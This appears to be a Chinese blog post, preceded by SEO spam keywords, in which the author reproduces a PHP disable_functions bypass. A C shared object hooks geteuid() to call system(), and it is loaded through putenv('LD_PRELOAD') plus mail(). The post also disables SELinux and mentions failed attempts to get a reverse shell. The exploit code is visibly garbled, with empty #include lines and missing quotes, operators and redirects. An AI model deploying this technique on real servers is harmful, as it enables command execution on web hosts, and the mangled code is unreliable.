如何查看网站开发的语言,公司创建网站销售,温州app开发,做网站还需要搜狗吗今天看来一篇文章#xff1a;http://cb.drops.wiki/wooyun/drops/tips-16054.html复现了一下#xff0c;感觉有点坑我把复现的过程#xff0c;结果和遇到问题在这里总结一下我的实验环境是centos7 php 5.4首先按照要求编译一个so1.创建一个hehe.c#include #include #include…今天看来一篇文章http://cb.drops.wiki/wooyun/drops/tips-16054.html复现了一下感觉有点坑我把复现的过程结果和遇到问题在这里总结一下我的实验环境是centos7 php 5.4首先按照要求编译一个so1.创建一个hehe.c#include #include #include void payload() {system(ls /home /var/www/html/kkkk.txt);}int geteuid() {if (getenv(LD_PRELOAD) NULL) { return 0; }unsetenv(LD_PRELOAD);payload();}然后编译一下gcc -c -fPIC hehe.c -o hehegcc --share hehe -o hehe.so生成一个hehe.so文件关闭selinux setenforce 0然后写一个test.php文件putenv(LD_PRELOAD/var/www/html/hehe.so);mail(alocalhost,,,,);?访问等待了很久才在在网站根目录下生成一个kkkk.txt虽然是成功生成了kkkk.txt并且内容也是正确的。但是有几个问题我搞了一天都没有解决1.生成的时候特别慢特别卡无论我把机子的性能调整到多高2.不能用system函数读和删除文件查看日志发现路径虽然写对了但是在日志中发现大量文件不存在或者没有被发现的错误记录很郁闷而且错误记录不止一条有很多证明mail函数在邮件没有发送成功的时候反复发送直到一个阀值才停下3.无法用常规的方式反弹shell出来
